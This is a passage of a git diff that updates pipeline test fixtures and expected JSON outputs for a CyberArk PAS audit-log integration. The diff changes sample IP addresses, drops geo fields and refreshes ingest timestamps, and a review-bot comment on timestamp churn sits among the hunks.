06:28:00\",\"IsoTimestamp\":\"2021-03-14T13:28:00Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"309\",\"Desc\":\"Undefined User Logon\",\"Severity\":\"Error\",\"Issuer\":\"testark\",\"Action\":\"Undefined User Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Undefined User Logon\",\"GatewayStation\":\"67.43.156.15\"}}}", "code": "309", "kind": "event", "action": "authentication_failure", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-31-cpm-reconcile-password.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-31-cpm-reconcile-password.log-expected.json index 804841a71be..bac89b31297 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-31-cpm-reconcile-password.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-31-cpm-reconcile-password.log-expected.json 
@@ -72,7 +72,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:32.839807100Z", + "ingested": "2021-12-09T13:36:54.412027600Z", "original": "{\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eno\u003c/Rfc5424\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.6.0000\u003c/Version\u003e\\n \u003cMessageID\u003e31\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eWindows\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WIN-SERVER-LOCAL-dbserver.cyberark.local-Administrator2\u003c/File\u003e\\n \u003cStation\u003e10.2.0.4\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=dbserver.cyberark.local;username=Administrator2;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WIN-SERVER-LOCAL\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"Administrator2\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"dbserver.cyberark.local\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" 
Value=\\\"DBServer\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"SequenceID\\\" Value=\\\"1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessReconciliation\\\" Value=\\\"1604944215\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Customer\\\" Value=\\\"EvilCorp\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"IsoTimestamp\":\"2021-03-16T15:01:00Z\",\"Version\":\"11.6.0000\",\"MessageID\":\"31\",\"Desc\":\"CPM Reconcile Password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Windows\",\"File\":\"Root\\\\Operating System-WIN-SERVER-LOCAL-dbserver.cyberark.local-Administrator2\",\"Station\":\"10.2.0.4\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask\",\"ExtraDetails\":\"address=dbserver.cyberark.local;username=Administrator2;\",\"Message\":\"CPM Reconcile Password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WIN-SERVER-LOCAL\"},{\"Name\":\"UserName\",\"Value\":\"Administrator2\"},{\"Name\":\"Address\",\"Value\":\"dbserver.cyberark.local\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating 
System\"},{\"Name\":\"LogonDomain\",\"Value\":\"DBServer\"},{\"Name\":\"SequenceID\",\"Value\":\"1\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"LastSuccessReconciliation\",\"Value\":\"1604944215\"},{\"Name\":\"Customer\",\"Value\":\"EvilCorp\"}]}}}}", "code": "31", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-310-monitor-dr-replication-start.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-310-monitor-dr-replication-start.log-expected.json index 4e3c5495fa7..085f60f49b2 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-310-monitor-dr-replication-start.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-310-monitor-dr-replication-start.log-expected.json @@ -47,7 +47,7 @@ "event": { "severity": 2, "action": "monitor dr replication start", - "ingested": "2021-06-09T10:24:32.883718900Z", + "ingested": "2021-12-09T13:36:54.557699900Z", "original": "\u003c5\u003e1 2021-03-04T19:10:01Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:10:01\",\"IsoTimestamp\":\"2021-03-04T19:10:01Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"310\",\"Desc\":\"Monitor DR Replication start\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Monitor DR Replication start\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Monitor DR Replication start\",\"GatewayStation\":\"\"}}}", "code": "310", "kind": "event" 
@@ -90,7 +90,7 @@ "event": { "severity": 2, "action": "monitor dr replication start", - "ingested": "2021-06-09T10:24:32.883735400Z", + "ingested": "2021-12-09T13:36:54.557707500Z", "original": "Mar 08 02:48:07 VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"310\",\"Desc\":\"Monitor DR Replication start\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Monitor DR Replication start\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Monitor DR Replication start\",\"GatewayStation\":\"\"}}}", "code": "310", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-311-monitor-dr-replication-end.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-311-monitor-dr-replication-end.log-expected.json index fd77767d416..ace8cf5a812 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-311-monitor-dr-replication-end.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-311-monitor-dr-replication-end.log-expected.json 
@@ -47,7 +47,7 @@ "event": { "severity": 2, "action": "monitor dr replication end", - "ingested": "2021-06-09T10:24:32.928867700Z", + "ingested": "2021-12-09T13:36:54.731499500Z", "original": "\u003c5\u003e1 2021-03-04T19:10:01Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:10:01\",\"IsoTimestamp\":\"2021-03-04T19:10:01Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"311\",\"Desc\":\"Monitor DR Replication end\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Monitor DR Replication end\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Monitor DR Replication end\",\"GatewayStation\":\"\"}}}", "code": "311", "kind": "event" @@ -90,7 +90,7 @@ "event": { "severity": 2, "action": "monitor dr replication end", - "ingested": "2021-06-09T10:24:32.928881400Z", + "ingested": "2021-12-09T13:36:54.731508200Z", "original": "Mar 08 02:48:07 VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"311\",\"Desc\":\"Monitor DR Replication end\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Monitor DR Replication end\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Monitor DR Replication end\",\"GatewayStation\":\"\"}}}", "code": "311", "kind": "event" 
diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-316-reset-user-password-detailed-information.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-316-reset-user-password-detailed-information.log
index 41f67cb2add..7763fe77b0f 100644
--- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-316-reset-user-password-detailed-information.log
+++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-316-reset-user-password-detailed-information.log
@@ -1 +1 @@
-<5>1 2021-03-10T18:16:45Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:45","IsoTimestamp":"2021-03-10T18:16:45Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"316","Desc":"Reset User Password Detailed Information","Severity":"Info","Issuer":"Administrator","Action":"Reset User Password Detailed Information","SourceUser":"PSMGw_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"Password changed","ExtraDetails":"","Message":"Reset User Password Detailed Information","GatewayStation":""}}}
+<5>1 2021-03-10T18:16:45Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:45","IsoTimestamp":"2021-03-10T18:16:45Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"316","Desc":"Reset User Password Detailed Information","Severity":"Info","Issuer":"Administrator","Action":"Reset User Password Detailed Information","SourceUser":"PSMGw_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"Password changed","ExtraDetails":"","Message":"Reset User Password Detailed Information","GatewayStation":""}}}
diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-316-reset-user-password-detailed-information.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-316-reset-user-password-detailed-information.log-expected.json index a994507e65a..69f60d165d0 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-316-reset-user-password-detailed-information.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-316-reset-user-password-detailed-information.log-expected.json @@ -7,20 +7,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -37,7 +25,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -46,7 +34,7 @@ "rfc5424": true, "reason": "Password changed", "iso_timestamp": "2021-03-10T18:16:45Z", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Reset User Password Detailed Information", "source_user": "PSMGw_VAGRANT", "message": "Reset User Password Detailed Information", 
@@ -61,8 +49,8 @@ "event": { "severity": 2, "action": "reset user password detailed information", - "ingested": "2021-06-09T10:24:32.965227300Z", - "original": "\u003c5\u003e1 2021-03-10T18:16:45Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:16:45\",\"IsoTimestamp\":\"2021-03-10T18:16:45Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"316\",\"Desc\":\"Reset User Password Detailed Information\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Reset User Password Detailed Information\",\"SourceUser\":\"PSMGw_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"Password changed\",\"ExtraDetails\":\"\",\"Message\":\"Reset User Password Detailed Information\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:54.898654500Z", + "original": "\u003c5\u003e1 2021-03-10T18:16:45Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:16:45\",\"IsoTimestamp\":\"2021-03-10T18:16:45Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"316\",\"Desc\":\"Reset User Password Detailed Information\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Reset User Password Detailed Information\",\"SourceUser\":\"PSMGw_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"Password changed\",\"ExtraDetails\":\"\",\"Message\":\"Reset User Password Detailed Information\",\"GatewayStation\":\"\"}}}", "code": "316", "kind": "event" } 
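Review bot: `event.ingested` is a wall-clock value stamped by the ingest node, and this hunk changes it from `2021-06-09T10:24:32.965227300Z` to `2021-12-09T13:36:54.898654500Z` next to the one meaningful change (the `Station` value inside `event.original`), so every regeneration of these expected files will keep producing diff noise on a field that carries no test signal. If `event.ingested` is not already listed under `dynamic_fields` in this data stream's pipeline test config (`_dev/test/pipeline/test-common-config.yml`, not visible in this diff), add `dynamic_fields:` / `  event.ingested: ".*"` so the comparison never depends on it; if it is already there the churn is harmless and only the `original`/`station` lines in these hunks need review.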
diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-317-reset-user-password.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-317-reset-user-password.log
index f52711e43b9..2ba6ee49eb0 100644
--- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-317-reset-user-password.log
+++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-317-reset-user-password.log
@@ -1 +1 @@
-<5>1 2021-03-10T18:16:45Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:45","IsoTimestamp":"2021-03-10T18:16:45Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"317","Desc":"Reset User Password","Severity":"Info","Issuer":"Administrator","Action":"Reset User Password","SourceUser":"PSMGw_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Reset User Password","GatewayStation":""}}}
+<5>1 2021-03-10T18:16:45Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:45","IsoTimestamp":"2021-03-10T18:16:45Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"317","Desc":"Reset User Password","Severity":"Info","Issuer":"Administrator","Action":"Reset User Password","SourceUser":"PSMGw_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Reset User Password","GatewayStation":""}}}
diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-317-reset-user-password.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-317-reset-user-password.log-expected.json
index 014c988bed6..684015175d5 100644
--- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-317-reset-user-password.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-317-reset-user-password.log-expected.json @@ -7,20 +7,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -37,7 +25,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -45,7 +33,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T18:16:45Z", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Reset User Password", "source_user": "PSMGw_VAGRANT", "message": "Reset User Password", 
@@ -60,8 +48,8 @@ "event": { "severity": 2, "action": "reset user password", - "ingested": "2021-06-09T10:24:32.992212100Z", - "original": "\u003c5\u003e1 2021-03-10T18:16:45Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:16:45\",\"IsoTimestamp\":\"2021-03-10T18:16:45Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"317\",\"Desc\":\"Reset User Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Reset User Password\",\"SourceUser\":\"PSMGw_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Reset User Password\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:54.999436800Z", + "original": "\u003c5\u003e1 2021-03-10T18:16:45Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:16:45\",\"IsoTimestamp\":\"2021-03-10T18:16:45Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"317\",\"Desc\":\"Reset User Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Reset User Password\",\"SourceUser\":\"PSMGw_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Reset User Password\",\"GatewayStation\":\"\"}}}", "code": "317", "kind": "event" } diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-32-add-owner.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-32-add-owner.log index 6aee911c509..3e513ad1c03 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-32-add-owner.log 
+++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-32-add-owner.log 
@@ -1,16 +1,16 @@
-<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Master","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Administrator","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Batch","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Operators","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Backup Users","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Auditors","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"DR Users","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Notification Engines","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:22Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:22","IsoTimestamp":"2021-03-10T09:11:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMPApp_localhost.localdomain","TargetUser":"","Safe":"PVWAConfig","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:23Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:23","IsoTimestamp":"2021-03-10T09:11:23Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMAppUsers","TargetUser":"","Safe":"PSMPLiveSessions","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:23Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:23","IsoTimestamp":"2021-03-10T09:11:23Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Vault Admins","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:23Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:23","IsoTimestamp":"2021-03-10T09:11:23Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PVWAAppUsers","TargetUser":"","Safe":"PSMPLiveSessions","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
